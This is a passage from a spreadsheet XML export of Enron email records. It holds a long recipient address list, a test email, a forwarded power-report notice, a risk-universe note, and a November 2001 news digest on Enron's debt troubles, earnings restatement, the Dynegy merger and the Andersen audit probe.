&lt;.xiaojun@enron.com&gt;', 'reagan.rorschach@enron.com', 'jaime.gualy@enron.com', 'grace.kim@enron.com', 'brian.hendon@enron.com', 'e-mail &lt;.mateo@enron.com&gt;', 'young.lee@enron.com', 'e-mail &lt;.jeffrey@enron.com&gt;', 'vincent.wagner@enron.com', 'robin.rodrigue@enron.com', 'e-mail &lt;.akida@enron.com&gt;', 'judd.eisenberg@enron.com', 'e-mail &lt;.michelle@enron.com&gt;', 'philip.durst@enron.com', 'marc.wharton@enron.com', 'neeran.pathak@enron.com', 'shelia.benke@enron.com', 'damon.harvey@enron.com', 'e-mail &lt;.galin@enron.com&gt;', 'travis.winfrey@enron.com', 'john.king@enron.com', 'farouk.lalji@enron.com', 'michelle.yee@enron.com', 'charles.wickman@enron.com', 'suresh.vasan@enron.com', 'e-mail &lt;.john@enron.com&gt;', 'bryan.williams@enron.com', 'ashley.worthing@enron.com', 'ahmet.kose@enron.com', 'george.thomas@enron.com', 'brian.steinbrueck@enron.com', 'james.wininger@enron.com', 'lindsay.renaud@enron.com', 'phil.polsky@enron.com', 'e-mail &lt;.margaret@enron.com&gt;', 'matt.smith@enron.com', 'ravi.mujumdar@enron.com', 'alton.jackson@enron.com', 'kendra.terhune@enron.com', 'sharon.hausinger@enron.com', 'e-mail &lt;.travis@enron.com&gt;', 'vance.holtzman@enron.com', 'e-mail &lt;.allison@enron.com&gt;', 'richard.yeboah@enron.com', 'di.mu@enron.com', 'gray.calvert@enron.com', 'hicham.benjelloun@enron.com', 'carlos.gorricho@enron.com', 'clarissa.cooper@enron.com', 'aaron.martinsen@enron.com', 'tj.rylander@enron.com', 'meera.natarajan@enron.com', 'g.carroll@enron.com', 'sarah.taylor@enron.com', 'e-mail &lt;.kreg@enron.com&gt;', 'david.loosley@enron.com', 'billy.braddock@enron.com', 'matthew.lenhart@enron.com', 'john.grace@enron.com', 'greg.martin@enron.com', 'chuck.ames@enron.com', 'sarah.driscoll@enron.com', 'peter.chung@enron.com', 'chris.loehr@enron.com', 'abhijeet.naik@enron.com', 'anthony.sexton@enron.com', 'margaret.rhee@enron.com', 'tyrell.harrison@enron.com', 'e-mail &lt;.chadwick@enron.com&gt;', 'alejandro.hernandez@enron.com', 'chad.south@enron.com', 'e-mail &lt;.na@enron.com&gt;', 'a.plauche@enron.com', 'stephanie.kimble@enron.com', 'yuan.tian@enron.com', 'n..stewart@enron.com', 'e-mail &lt;.suzette@enron.com&gt;', 'e-mail &lt;.samar@enron.com&gt;', 'm..carlson@enron.com', 'e-mail &lt;.leonard@enron.com&gt;', 'michael.wong@enron.com', 'shereka.jefferson@enron.com', 'sladana-anna.kulic@enron.com', 'ryan.herron@enron.com', 'c.blakely@enron.com', 'akida.bellamy@enron.com', 'm..hobson@enron.com', 'benjamin.rogers@enron.com', 'e-mail &lt;.chetan@enron.com&gt;', "ryan.o'rourke@enron.com", 'ian.salmon@enron.com', 'kyle.berryman@enron.com', 'e-mail &lt;.eva@enron.com&gt;', 'daniel.hyslop@enron.com', 'catalina.cardenas@enron.com', 'e-mail &lt;.timothy@enron.com&gt;', 'kourtney.nelson@enron.com', 'e-mail &lt;.ashish@enron.com&gt;', 'e-mail &lt;.hans@enron.com&gt;', 'f.samudio@enron.com', 'susan.rance@enron.com', 'nate.blackburn@enron.com', 'eric.schneider@enron.com', 'e-mail &lt;.dayem@enron.com&gt;', 'e-mail &lt;.muhammad@enron.com&gt;', 'e-mail &lt;.marsha@enron.com&gt;', 'e-mail &lt;.bruno@enron.com&gt;', 'jason.kaniss@enron.com', 'lane.merchant@enron.com', 'e-mail &lt;.jaime@enron.com&gt;', 'e-mail &lt;.rachana@enron.com&gt;', 'p..dupre@enron.com', 'rajib.saha@enron.com', 'e-mail &lt;.cindi@enron.com&gt;', 'e-mail &lt;.susan@enron.com&gt;', 'chris.stokley@enron.com', 'ilan.caplan@enron.com', 'ami.thakkar@enron.com', 'wesley.thoman@enron.com', 'kate.lucas@enron.com', 'gary.justice@enron.com', 'e-mail &lt;.justin@enron.com&gt;', 'e-mail &lt;.steven@enron.com&gt;', 'paul.gregory@enron.com', 't..wood@enron.com', 'ying.liu@enron.com', 'c.scott@enron.com', 'catherine.pernot@enron.com', 'angela.saenz@enron.com', 'e-mail &lt;.sara@enron.com&gt;', 'clifford.nash@enron.com', 'yevgeny.frolov@enron.com', 'e-mail &lt;.thomas@enron.com&gt;', 'hang.bui@enron.com', 'e-mail &lt;.albane@enron.com&gt;', 'j..silver@enron.com', 'e-mail &lt;.diana@enron.com&gt;', 'e-mail &lt;.sebastian@enron.com&gt;', 'e-mail &lt;.kevin@enron.com&gt;', 'rahul.seksaria@enron.com', 'jeremy.lo@enron.com', 'matthew.almy@enron.com', 'sanjay.konur@enron.com', 'massimo.marolo@enron.com', 'posey.martinez@enron.com', 'marlene.devotto@enron.com', 'a.connolly@enron.com', 'adnan.patel@enron.com', 'dustin.collins@enron.com', 'claude.tellis@enron.com', 'shalesh.ganjoo@enron.com', 'john.gordon@enron.com', 'barry.lewis@enron.com', 'will.chen@enron.com', 'e-mail &lt;.michael@enron.com&gt;', 'priya.jaisinghani@enron.com', 'l..gay@enron.com', 'rebecca.walker@enron.com', 'stacy.patton@enron.com', 'martin.sonesson@enron.com', 'vaibhav.rekhi@enron.com', 'mohamed.elafandi@enron.com', 'tony.wolfe@enron.com', 'e-mail &lt;.samuel@enron.com&gt;'})</t>
  </si>
  <si>
    <t>Test email</t>
  </si>
  <si>
    <t>I am from the Associate/Analyst department and I am sending out this test email.  If you are no longer an associate or analyst, or would not like to receive future information please let me know, so that I can remove you from the distribution list.  If there is someone you know that did not receive this email please have them to email me._x000D_
_x000D_
thank you,_x000D_
_x000D_
jc</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 04:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/04/2000 _x000D_
12:29 PM ---------------------------_x000D_
_x000D_
_x000D_
"Btu" &lt;subs@Btu.net&gt; on 12/01/2000 05:15:39 PM_x000D_
To: "Btu's Weekly Power Report" &lt;&gt;_x000D_
cc:  _x000D_
Subject: Btu's Weekly Power Report_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest issue of Btu's Weekly Power Report_x000D_
_x000D_
_x000D_
e-mail: info@Btu.net_x000D_
phone: 732-758-8222_x000D_
fax: 732-758-8286_x000D_
_x000D_
_x000D_
_x000D_
 - wp120400.pdf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 10:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2001 Risk Universe</t>
  </si>
  <si>
    <t xml:space="preserve">Steve -_x000D_
_x000D_
Thanks again for meeting with us today.  Attached below is the 2001 Risk _x000D_
Universe for your info.  If you have any other thoughts or comments, please _x000D_
don't hesitate to call._x000D_
_x000D_
Terrie_x000D_
x35201_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 06:53:25 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Mentions- 11/20/01</t>
  </si>
  <si>
    <t xml:space="preserve">Enron Warns of Problems Eroding Profit_x000D_
The Wall Street Journal, 11/20/01_x000D_
FRONT PAGE - COMPANIES &amp; MARKETS - Wall St worries over Enron deal._x000D_
Financial Times, 11/20/01_x000D_
Enron drops earnings for 3rd quarter_x000D_
$690 million dept comes due for downgrade firm_x000D_
Houston Chronicle, 11/20/01_x000D_
_x000D_
Bankers concerned Dynergy may abandon Enron deal - report_x000D_
AFX News, 11/20/01_x000D_
IN BRIEF / ENERGY Enron May Be Forced to Settle $690-Million Debt_x000D_
Los Angeles Times, 11/20/01_x000D_
IN BRIEF / ACCOUNTING Arthur Andersen Probe Requested_x000D_
Los Angeles Times, 11/20/01_x000D_
U.S. Official Calls for Probe Of Andersen, 2 Problem Audits_x000D_
The Wall Street Journal Europe, 11/20/01_x000D_
Career Journal: The Jungle_x000D_
The Wall Street Journal, 11/20/01_x000D_
In New Filing, Enron Reports Debt Squeeze_x000D_
The New York Times, 11/20/01_x000D_
Decision to locate ConocoPhillips in Houston enhances world's energy capital_x000D_
Associated Press Newswires, 11/20/01_x000D_
COMPANIES &amp; FINANCE THE AMERICAS - Energy deal savings set to increase._x000D_
Financial Times, 11/20/01_x000D_
U.S. Equity Preview: Enron, Hot Topic, MetLife, UAL_x000D_
Bloomberg, 11/20/01_x000D_
Enron restates Q3 to deeper loss; toils to restructure $690M payment_x000D_
The Canadian Press, 11/19/01_x000D_
Enron restates third-quarter earnings_x000D_
Associated Press Newswires, 11/19/01_x000D_
USA: Enron sounds debt alarm, reduces reported earnings._x000D_
Reuters English News Service, 11/19/01_x000D_
Enron Warns That Raft of Problems May Hurt Its Fourth-Quarter Profit_x000D_
Dow Jones Business News, 11/19/01_x000D_
Enron Files 10-Q For 3Q With SEC_x000D_
Dow Jones News Service, 11/19/01_x000D_
Fears Mount Over Enron/Dynasty Deal_x000D_
CNNfn: Markets Impact, 11/19/01_x000D_
Enron Reduces Earnings, Warns $690 Mln Payment Due (Update2)_x000D_
Bloomberg, 11/19/01_x000D_
_x000D_
ChevronTexaco Sees Investor Suits as Threat to Enron (Update1)_x000D_
Bloomberg, 11/19/01_x000D_
_x000D_
Enron Says It May Have to Pay Off $690 Mln Note Next Week_x000D_
Bloomberg, 11/19/01_x000D_
_x000D_
Enron's Azurix May Have to Sell Assets If It Can't Borrow_x000D_
Bloomberg, 11/19/01_x000D_
_x000D_
U.S.'s Dingell Seeks Probe of Arthur Andersen, Dow Jones Says_x000D_
Bloomberg, 11/19/01_x000D_
_x000D_
ENRON RESTATES Q3 RESULTS_x000D_
CBS.MarketWatch.com, 11/19/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron Warns of Problems Eroding Profit_x000D_
By Rebecca Smith_x000D_
Staff Reporter of The Wall Street Journal_x000D_
_x000D_
11/20/2001_x000D_
The Wall Street Journal_x000D_
B16_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
Enron Corp. warned that continuing credit worries, a decline in the value of some of its assets and reduced trading activity could hurt its fourth-quarter earnings. _x000D_
The energy company said it may be forced to take a $700 million pretax hit to earnings due to a plunge in the value of assets held by one of its investment partnerships. The partnership, Whitewing LLP, held assets with a book value of $4.7 billion on Nov. 16 but a drop in the value of Enron stock held by the partnership could result in a derivative loss of $700 million, the company said._x000D_
In addition, Enron, Houston, said it may have to come up with more money to honor a collateral call on a $690 million note. That note became a "demand obligation," on Nov. 12, when Enron's credit rating got lowered to triple-B-minus by Standard &amp; Poor's. The company didn't disclose who holds the note. _x000D_
"We've got nine days to either repay the note or post a letter of credit or they can start liquidating assets," said company spokesman Mark Palmer. One of the assets includes C.E.G. Rio, a gas distribution company in Brazil that Enron already is in the process of selling and whose proceeds it had intended to use for other forms of debt reduction. The company said it is trying to negotiate a waiver or extension of the credit provision with lenders to preserve its cash. _x000D_
Enron has set up a number of partnerships over the years to hedge investment risks and, in some cases, to keep debt off its balance sheet. In the wake of a Securities and Exchange Commission formal probe into its accounting and disclosure practices launched Oct. 31, the company restated its earnings downward dating back to 1997 and has consolidated some debt back onto its balance sheet. _x000D_
The company on Nov. 9 agreed to merge with competitor Dynegy Inc. But its latest SEC filing said it was sued by shareholders on Nov. 12 in state court in Houston to prevent the merger from happening. The petition alleges that Enron's directors breached their fiduciary duties to Enron's shareholders by agreeing to sell Enron for inadequate consideration and without an adequate investigation of the alternatives available to Enron. Enron said it would vigorously defend itself. _x000D_
Yesterday's filing included numerous changes in previously reported numbers for revenues and expenses. In its original third-quarter statement, the company reported a loss of $618 million. The stated loss was increased to $635 million last week and in the latest filing, the loss for the quarter ended Sept. 30 was widened to $664 million. _x000D_
Enron added that the numbers contained in latest filing aren't necessarily final because its external auditor, Arthur Andersen, hasn't completed its review, nor has an internal audit committee finished reviewing the firm's accounting practices._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
FRONT PAGE - COMPANIES &amp; MARKETS - Wall St worries over Enron deal._x000D_
By ANDREW BALLS, ANDREW HILL and GARY SILVERMAN._x000D_
_x000D_
11/20/2001_x000D_
Financial Times_x000D_
(c) 2001 Financial Times Limited . All Rights Reserved_x000D_
Senior Wall Street bankers are concerned that Dynegy could walk away from its proposed $9.8bn ( #6.8bn) rescue bid for its rival energy group Enron - a move that would have severe repercussions for the energy trading sector and financial markets. _x000D_
In a series of interviews with the Financial Times, bankers expressed worries that while credit rating agencies had been assured that it was extremely difficult for Dynegy to pull out, some of the company's shareholders were under the impression that the "material adverse change" clause could be triggered._x000D_
"There is no way you can say that this deal is definitely going to happen, or even likely to happen," one banker said. "And the knock on effects of it not going ahead are not good," he added. None of the bankers would agree to be publicly identified. _x000D_
The possibility of Dynegy dropping out of the deal was discussed when senior bankers from JP Morgan Chase and Citigroup, which are advising Enron, met with officials from Moody's, the credit rating agencies, 10 days ago. _x000D_
The rating agency expressed concerns that it would be too easy for Dynegy to give up its bid, further undermining Enron's creditworthiness. _x000D_
Moody's decision to preserve Enron's investment grade rating was one of the main reasons why Dynegy was able to go ahead with its rescue bid. _x000D_
In justifying the all-stock bid, Chuck Watson, chairman of Dynegy, said last week that buying the company for a low price - a fraction of Enron's market capitalisation at its peak in 2000 - was a major protection against failure. _x000D_
But he admitted that much of the last round of negotiations with Moody's had been spent reassuring them that the material adverse change clauses in the merger agreement were not too loose. _x000D_
According to Dynegy, the material adverse change clauses relate to the outcome of a Securities and Exchange Commission inquiry into Enron's finances, possible litigation against the energy company, balance sheet strength and earnings forecasts. www.ft.com/enron. _x000D_
(c) Copyright Financial Times Ltd. All rights reserved. _x000D_
http://www.ft.com._x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Enron drops earnings for 3rd quarter _x000D_
$690 million debt comes due for downgraded firm _x000D_
By TOM FOWLER _x000D_
Copyright 2001 Houston Chronicle _x000D_
Enron Corp.'s financial well-being continues to be a moving target as the company made more adjustments to its earnings Monday. _x000D_
In a Securities and Exchange Commission filing, Enron said it reduced third-quarter earnings by 3 cents per share and increased earnings for the first nine months of 2001 by 1 cent to reflect recently discovered accounting errors. _x000D_
The company also said that its recent credit rating drop may force it to pay off a $690 million note by Nov. 27 if it doesn't find collateral to guarantee the debt. _x000D_
The revelations came in the embattled energy trader's 10-Q document, which companies must file every quarter with details of their earnings and balance sheet. Enron delayed releasing the 10-Q by five days and said the filing made Monday had not been fully audited by its accounting firm, Andersen, because of an ongoing investigation by the company's board of directors and the need for more time. _x000D_
"We are continuing to review the transactions in question and are making progress with our investigation," said William K. Powers Jr., chairman of Enron's special investigation committee and dean of the University of Texas School of Law. _x000D_
Enron's pending $690 million IOU is related to a limited partnership to buy natural gas assets in Brazil. One of the terms of the partnership requires Enron to repay the debt if its credit rating slips to BBB- on rating agency Standard &amp; Poor's scale, which it did Nov. 12. If Enron doesn't put up collateral equal to the amount of the note or repay it, the other partners in the deal can sell off the partnership's assets. _x000D_
Enron officials said in the filing they are working with lenders to come up with an acceptable agreement on the debt. _x000D_
If Enron's debt rating continues to drop, which would put it below investment grade, the company would face another $3.9 billion in debt repayments, the company said in the filing, mainly by two other partnerships formed in recent years: $2.4 billion owed by Osprey Trust and $915 million by Marlin Water Trust. _x000D_
Enron is under a negative review by most rating agencies, but a cash infusion from Dynegy combined with additional lines of credit from a number of investment banks and a possible $500 million to $1 billion equity investment by other investors is expected to keep the ratings afloat. _x000D_
The turmoil around Enron's finances started after Oct. 16, when steep losses in its third-quarter earnings drew renewed attention to a pair of investment partnerships created by the former chief financial officer with the approval of the company's board of directors. _x000D_
The LJM partnerships were formed using Enron equity and outside capital as a way to hedge against the risks involved in some of the company's new lines of business and were designed to help the company grow quickly without adding too much debt to its books or diluting the value of the company's stock. _x000D_
The CFO's dual roles as a company executive and managing director of the entities prompted an SEC investigation as well as an internal Enron investigation that led the company to cut its earnings over the past 4 1/2 years by nearly $600 million. _x000D_
Those problems shook investor and trading partner confidence in Enron, which led to a sharp drop in its stock price and cuts in its credit rating. The company eventually reached a deal with rival Dynegy to be acquired for almost $9 billion in stock plus the assumption of almost $13 billion in debt and $2 billion in preferred stock. _x000D_
The fallout from Enron's crumble is spreading to its major service providers, including Andersen. That firm has been named as a defendant in at least one shareholder lawsuit, while on Monday Rep. John Dingell, D-Mich., called for an investigation of Andersen in connection with its audits of Enron and Houston-based Waste Management. _x000D_
"The best accounting standards in the world are meaningless if the accounting and audit processes are so inept or corrupt that they produce unreliable numbers and untruthful reporting," Dingell wrote in a letter to the Public Oversight Board requesting the investigation. _x000D_
Andersen, based in Chicago, has a large Houston office and a strong foothold in the energy industry with clients, including Enron and Dynegy. Critics of Andersen have said the firm should have done more as Enron's auditor to draw investors' attention to the company's unusual finances. _x000D_
A lawsuit filed in Oregon alleged Andersen's judgment was swayed by lucrative consulting fees that it received from Enron while it was auditor. _x000D_
In June, Andersen was fined $7 million by the SEC to settle charges that it filed false and misleading audit reports of Waste Management, the largest civil penalty against a Big Five accounting firm. Andersen did not admit or deny the charges. _x000D_
Reuters News Service contributed to this story. _x000D_
_x000D_
_x000D_
Bankers concerned Dynergy may abandon Enron deal - report_x000D_
_x000D_
11/20/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
LONDON (AFX) - Senior Wall Street bankers are concerned Dynergy Inc could walk away from its proposed rescue bid for its rival energy group Enron Corp, reports the Financial Times without citing sources. _x000D_
The FT says bankers are worried the company could trigger the "material adverse change" clause in the deal._x000D_
mps/mkp For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Business; Financial Desk_x000D_
IN BRIEF / ENERGY Enron May Be Forced to Settle $690-Million Debt_x000D_
Reuters_x000D_
_x000D_
11/20/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
C-3_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
Enron Corp. warned in a regulatory filing that it could be forced to pay a $690-million debt by next week and reduced its already abysmal third-quarter earnings. _x000D_
The energy giant said a downgrading of its debt last week triggered a Monday deadline for it to repay or offer collateral against the $690 million owed to a party in one of its partnerships._x000D_
If the debt isn't paid, the partner could liquidate the partnership's assets, which include a Brazilian natural gas company that Enron was counting on selling to raise $250 million in cash. _x000D_
Enron has already used up its $3-billion credit line, secured roughly $2 billion in loans and is looking for more cash. _x000D_
The company reduced its previously reported results for the third quarter by 3 cents a share, according to its filing with the Securities and Exchange Commission. That would put its loss at 87 cents a share._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Business; Financial Desk_x000D_
IN BRIEF / ACCOUNTING Arthur Andersen Probe Requested_x000D_
Reuters_x000D_
_x000D_
11/20/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
C-3_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
A congressman has called for an investigation of Big Five accounting firm Arthur Andersen in connection with its audits of Enron Corp. and Waste Management Inc., according to a letter released Monday. _x000D_
Turning up the heat under the conflict-of-interest issue among the world's largest bean-counters, Rep. John D. Dingell (D-Mich.) asked the Public Oversight Board for a "review or special investigation of Arthur Andersen LLP," said the letter._x000D_
Dingell also asked the board to look into peer reviews of Arthur Andersen conducted in recent years by other accounting firms, including Deloitte &amp; Touche, and questioned the value of a triennial peer review process in place since 1978. _x000D_
Arthur Andersen, based in Chicago, was auditor to Houston energy trading giant Enron, rocked in recent weeks by a Securities and Exchange Commission probe of outside partnership deals involving company officers. Enron's stock price has plunged, several managers have resigned and numerous shareholder lawsuits are pending._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
U.S. Official Calls for Probe Of Andersen, 2 Problem Audits_x000D_
By Judith Burns_x000D_
Dow Jones Newswires_x000D_
_x000D_
11/20/2001_x000D_
The Wall Street Journal Europe_x000D_
22_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
WASHINGTON -- Concerned about the accounting profession's ability to police itself, a senior House of Representatives Democrat has called for a "special investigation" of Arthur Andersen LLP and its audits of Enron Corp. and Waste Management Inc. _x000D_
In a letter to U.S. Public Oversight Board Chairman Charles Bowsher released Monday, Rep. John Dingell, a Michigan Democrat, requested a review of Andersen's audits of Enron and Waste Management, two high-profile audit failures._x000D_
Enron, of Houston, which recently agreed to be acquired by crosstown rival Dynergy Inc., acknowledged it overstated net income by $586 million (662.5 million euros) and will need to restate financial reports dating back to 1997. _x000D_
The U.S. Securities and Exchange Commission is investigating Enron's treatment of investments in limited partnerships tied to former Chief Financial Officer Andrew Fastow. _x000D_
Enron's problems come on the heels of another audit debacle for Andersen. In June, the firm reached a $7 million settlement with the SEC in which it neither admitted nor denied allegations of fraud in its audit of Waste Management. _x000D_
Andersen and the waste hauler paid $220 million in 1999 to settle class-action lawsuits alleging massive accounting fraud that inflated Waste Management's reported earnings in the mid-1990s. _x000D_
In addition to the SEC's probe of its role in the Enron matter, Andersen is undergoing routine peer review by Deloitte &amp; Touche. Dingell suggested that review may be clouded by the fact that Deloitte &amp; Touche has been hired by outside lawyers representing a special committee of Enron's board of directors. _x000D_
Given the potential conflict of interest on the part of Deloitte &amp; Touche, and Andersen's track record, "there appears to be little reason for the public to have faith in Andersen or the peer review process," Mr. Dingell wrote._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Career Journal: The Jungle_x000D_
By Kemba J. Dunham_x000D_
_x000D_
11/20/2001_x000D_
The Wall Street Journal_x000D_
B10_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
[Focus on Retirement, Pay and Getting Ahead] _x000D_
Passing Up_x000D_
Some senior executives are spurning hefty severance packages. _x000D_
Last week, Enron Corp. Chairman Kenneth Lay decided to forgo a $60.6 million severance payment that would have been triggered by Dynegy Inc.'s planned acquisition of the Houston energy trader. Enron initially said Mr. Lay would keep one-third of the planned payout and take it in shares of the combined company. He later decided against any severance payment after criticism by influential energy traders, who produce most of Enron's profits. _x000D_
"In this environment, we're seeing producers putting pressure on managers and managers putting pressure on producers to ensure that their pay is in line with their performance," says Ira Kay, executive-compensation practice leader of pay-and-benefits consultants Watson Wyatt Worldwide in New York. _x000D_
Alan Johnson, managing director of New York pay consultants Johnson Associates, says Mr. Lay's initial intention to accept a portion of his severance represents "the continuing trend of executives being clueless." _x000D_
(For the 12 months ended Aug. 31, Mr. Lay received about $70 million from exercising Enron stock options, according to disclosure reports tracked by Thomson Financial.) _x000D_
Three top executives of US Airways Group Inc., including Chief Executive Rakesh Gangwal and Chairman Stephen Wolf, passed up severance after deciding to stay at the company when a planned merger fell through. The trio stood to gain $45 million for resigning as a result of severance agreements triggered by shareholder approval of its now-defunct merger accord with UAL Corp. At US Airways' Sept. 19 annual meeting, they said they would remain with the company. _x000D_
Firm Relationship _x000D_
New York law firm Cadwalader, Wickersham &amp; Taft last week rolled out an unusual formal mentoring program for first-year associates. _x000D_
For two hours a month for at least a year, each associate will meet with a designated mentor -- typically a midlevel associate -- to discuss issues such as career development. If the relationship doesn't click, new pairings will be made. CWT hires about 50 law-school graduates a year. _x000D_
Jordan Schwartz, the firm's hiring partner, says the initiative was sparked by a 2000 survey of midlevel associates at 165 U.S. law firms conducted by American Lawyer magazine. The poll, which assesses how associates perceive they are being treated, ranked the firm last. "It wasn't an accurate reflection of the firm," he says. "But it was a wake-up call." _x000D_
So, CWT created an "associate task force" that identified key issues and explored ways to improve the quality of work life. The mentoring program was one result. _x000D_
Hiring Blitz _x000D_
Despite rising joblessness, a few employers are hiring in a big way. _x000D_
ZipRealty Inc., an online real-estate broker in Richmond, Calif., recently announced plans to hire 1,000 real-estate agents within the next 18 months. It has about 135 agents, all of whom work from home. _x000D_
"We have large consumer demands right now, so we want to make sure we have great realtors," says Scott Kucirek, executive vice president of people and culture. _x000D_
Since August, zipRealty has hired nearly 30 agents a month for all its 12 markets, which include Los Angeles, Phoenix, San Diego and Chicago. The company has three full-time recruiters sending e-mails and making calls to market its recruitment effort. Its database contains 200 to 300 prospects. _x000D_
The job, which usually pays only commission, offers some perks. The company will pay new agents $1,500 a month for three months to give them time to make connections and sell a home. After that, pay will be entirely commission based. New hires also receive cellphone and car allowances. _x000D_
--- _x000D_
E-mail comments to Kemba.Dunham@wsj.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Business/Financial Desk; Section C_x000D_
In New Filing, Enron Reports Debt Squeeze_x000D_
By RICHARD A. OPPEL Jr. and FLOYD NORRIS_x000D_
_x000D_
11/20/2001_x000D_
The New York Times_x000D_
Page 1, Column 2_x000D_
c. 2001 New York Times Company_x000D_
The Enron Corporation told investors yesterday that it faced debt repayments over the next year vastly in excess of its available cash. It said that if any of a number of things went wrong, its ability to continue as a going concern would be called into question. _x000D_
In a delayed quarterly filing with the Securities and Exchange Commission, the company said that it would have to repay $690 million in debt by next Tuesday if it did not come up with collateral for a loan._x000D_
Enron has about $1.75 billion in cash and credit lines now available but faces debt repayments and other obligations of $9.15 billion by the end of next year. The report for the third quarter, which was filed five days late, says the company faces immediate demand for $3.9 billion in debts if its credit rating is downgraded any further. _x000D_
Enron's independent auditors with the firm of Arthur Andersen have not been able to complete their review of Enron's financial statements for the third quarter. Andersen already faces lawsuits over its audits of Enron's books related to Enron's disclosure this month that it had overstated almost $600 million in profits in the last five years. Enron has said that it will restate statements that Andersen certified and that those statements should no longer be relied upon. _x000D_
Yesterday, Representative John D. Dingell of Michigan, the ranking Democrat on the House Energy and Commerce Committee, called for an investigation into Arthur Andersen's handling of the Enron audits. A spokesman for Andersen could not be reached last night. _x000D_
Enron, the nation's largest energy trader, has agreed to be acquired by Dynegy Inc., its smaller crosstown rival in Houston, and credit rating agencies have said that a failure of that deal to go through would lead to a further downgrading of Enron, which is now at the lowest investment-grade rating. Any downgrades could lead to a collapse of Enron's core energy trading business, analysts say, as other energy trading companies might stop doing business with Enron entirely. _x000D_
The Dynegy deal is expected to close sometime next year, and the disclosures yesterday indicate that Enron may face challenges in meeting its obligations before then, particularly if the closing of the deal is delayed. Enron said it hoped to complete the transaction by the end of next September. _x000D_
Enron is in talks to obtain $500 million to $1 billion in additional financing through an equity infusion from major banks and institutions. In addition, executives have said they are hoping to close deals to sell $800 million in assets by the end of the year, and perhaps a few billion dollars of assets next year. Enron is also set to receive a $1 billion infusion from ChevronTexaco, which owns a 27 percent stake in Dynegy, if the deal closes next year. _x000D_
Still, even after factoring in cash flow from Enron's core energy-trading operations, Enron could be left well short of what it needs to satisfy the huge obligations due by the end of next year -- meaning that Enron will probably have to work to persuade bankers to restructure debts or extend maturities. _x000D_
Carol Coale, an analyst for Prudential Securities in Houston, said the new disclosures indicated that Enron's troubles had run deeper than what investors and analysts believed, even as the stock crashed early this month before the merger with Dynegy was announced. _x000D_
''Our initial read was that this might have been like a run on the bank,'' Ms. Coale said. ''But now it sounds like Enron's problems were actually more inherent than perceived.'' _x000D_
Enron's deal with Dynegy calls for Enron holders to receive 0.2685 Dynegy share for each Enron share, but in trading since the deal was announced Enron's share price has lagged Dynegy's price, reflecting investor doubts that the deal will be completed at the announced terms. _x000D_
In New York Stock Exchange trading yesterday, before the Enron filing was released, Enron rose 6 cents, to $9.06, and Dynegy rose $1.13, to $43.60. At those prices, the value of the Dynegy offer is 29.2 percent above Enron's share price, compared with a 20.6 percent difference when the deal was announced. _x000D_
Some debts that Enron might have to pay quickly if its bond rating is lowered could be satisfied by selling shares, but such sales would probably reduce the stock price further. And the merger agreement with Dynegy provides that the exchange ratio would be reduced if Enron sold stock at prices below the implied value under the merger -- currently $11.71 an Enron share. _x000D_
In after-hours trading yesterday, after the release of the Enron filing, the share price slipped to $9. _x000D_
Enron had previously said it was reducing its profits taken in previous years by more than $500 million. Yesterday's filing provided some additional details on Enron's relationships with various related partnerships whose debts Enron could be forced to pay, and it said that additional write-offs could come as early as the current quarter if it concluded that asset values in the partnerships had declined. It said that because Enron's stock value had fallen, one write-down could be $700 million. _x000D_
The disclosures show that Enron erected complicated financial structures that in some cases seem to have been meant to allow the company to avoid taking losses on assets and in other cases were aimed at keeping debts off its balance sheet. _x000D_
But the collapse of Enron's stock price has both worsened the situation for some of those entities and greatly increased the cost Enron would face if it needed to pay off the debts. _x000D_
''It is not possible to predict,'' Enron warned investors, whether its asset sales or debt refinancings would be successful. ''An adverse outcome with respect to any of these matters would likely have a material adverse impact on Enron's ability to continue as a going concern.''_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Decision to locate ConocoPhillips in Houston enhances world's energy capital_x000D_
By PAM EASTON_x000D_
Associated Press Writer_x000D_
_x000D_
11/20/2001_x000D_
Associated Press Newswires_x000D_
Copyright 2001. The Associated Press. All Rights Reserved._x000D_
HOUSTON (AP) - The decision to base the oil giant created by the combination of Phillips Petroleum Co. and Conoco Inc. in Houston, home of the smaller Conoco, helps cement the city's status as the nation's energy capital. _x000D_
"Houston already was the energy capital of the world. This just proves it," said Mark Baxter, director of the Maguire Energy Institute at Southern Methodist University in Dallas._x000D_
"All the major players are in Houston and Houston can accommodate the employee growth base," he said. "It is easier to conduct the business in the Houston market because not only are all the major companies there, all the support is in Houston as well." _x000D_
